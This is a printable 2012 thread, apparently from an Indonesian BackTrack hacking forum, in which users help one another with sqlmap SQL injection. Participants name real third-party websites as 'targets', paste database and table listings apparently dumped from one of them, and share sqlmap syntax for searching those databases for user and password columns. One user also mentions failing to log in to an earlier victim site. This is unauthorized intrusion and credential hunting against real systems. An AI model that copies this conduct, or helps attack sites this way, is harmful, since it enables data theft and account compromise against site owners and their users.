Indonesian Back|Track Team
SQLi Sqlmap.py - Printable Version



RE: SQLi Sqlmap.py - Junior Riau - 03-23-2012

Ohh, I get it:
Excellent, as we can see mysql server has two users without password. Next step is try to access the database using phpmyadmin (without credentials).
Using phpmyadmin web interface, we will try to find mysql’s datadir with the following sql query:

It uses phpMyAdmin via the browser, lol.

No wonder sqlmap doesn't show up anymore.
Maybe the URL is changed to url/phpmyadmin; it's still not very clear, though.


RE: SQLi Sqlmap.py - fake666 - 03-23-2012

Arghh, I still don't get it ==
So when we enter
select @@datadir;
/opt/lampp/var/mysql/
is that in the terminal or in the web browser, bro??


RE: SQLi Sqlmap.py - Junior Riau - 03-23-2012

The web browser, but via phpMyAdmin. phpMyAdmin is the web application on the web server; it serves as the user interface there, for example for creating databases, creating tables, running queries and so on.
Try installing XAMPP, WAMP or LAMP, any one of those three, then just run it and type localhost in the browser (turn apache2 off).
If you're unsure, better not :) or you'll end up with errors, unless you want to try it in vbox.


RE: SQLi Sqlmap.py - fake666 - 03-23-2012

Oh, I see.. OK then..
Hey bro, here's another target: http://ypc.or.id/?module=Forum&file_id=42
Have a look at it.
Hehe, by the way, how come I couldn't log in to yesterday's one? Weird ==


RE: SQLi Sqlmap.py - Junior Riau - 03-23-2012

That's what's weird, lol. OK OK, heading to the scene, bro :)


RE: SQLi Sqlmap.py - juicided - 03-23-2012

A question, bro. I've already got the databases:
1. information_schema
2. web9db5

The tables look like this:

Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+


Database: web9db5
[13 tables]
+--------------------+
| `-content_backup` |
| `-content_uk_back` |
| ausschreibungen |
| bildserien |
| bildserien_uk |
| content |
| content_fr |
| content_nl |
| content_uk |
| ergebnisse |
| fotografen |
| inhalttyp |
| medien |
+--------------------+

So how come there's no 'admin' or 'user' table??
How do I find it?
Please help...


RE: SQLi Sqlmap.py - fake666 - 03-23-2012

How's it going, junior.riau18, did it work?
I'm having a hard time here, it's really slow..



RE: SQLi Sqlmap.py - Junior Riau - 03-23-2012

Add --search user,password
so the syntax becomes

sqlmap.py -u urltarget, -D namabd --search user,password


RE: SQLi Sqlmap.py - juicided - 03-24-2012

Didn't find it, bro.
This is the site: www.pills-project.eu/index.php?id=138
Feel free to poke at it.

I'm going to try another target first, hehe.


RE: SQLi Sqlmap.py - Junior Riau - 03-24-2012

The site doesn't even have a login page, bro :P